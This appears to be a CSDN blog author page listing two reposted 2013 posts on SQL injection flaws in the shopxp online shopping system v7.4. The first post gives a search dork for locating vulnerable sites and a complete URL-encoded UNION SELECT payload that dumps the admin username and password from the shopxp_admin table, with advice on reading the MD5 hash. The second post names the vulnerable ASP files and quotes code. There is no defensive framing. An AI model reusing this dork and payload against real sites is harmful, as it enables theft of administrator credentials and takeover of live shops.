![](https://img-blog.csdnimg.cn/20201014180756738.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
shopxp
huzenhuzen
这个作者很懒,什么都没留下…
展开
-
shopxp网上购物系统 v7.4 SQL注入漏洞
关键字:inurl:shopxp_news.asp 注入代码:TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin 爆出用户名和密码 注意:用户名和密码是连在一起的,后十六位是密码MD5加密 adminb1转载 2013-05-04 10:17:31 · 1696 阅读 · 0 评论 -
shopxp网上购物系统 v7.4存在SQL注入漏洞
shopxp网上购物系统 v7.4存在Sql注入漏洞。 问题文件:xpCatalog_xpDesc.asp,xpCatalog_xpsmall_Desc.asp 问题代码: dim shopxpbe_id, anclassname, shopxpse_id, nclassname dim totalPut dim CurrentPage, TotalPages if reques转载 2013-05-04 10:21:15 · 1008 阅读 · 0 评论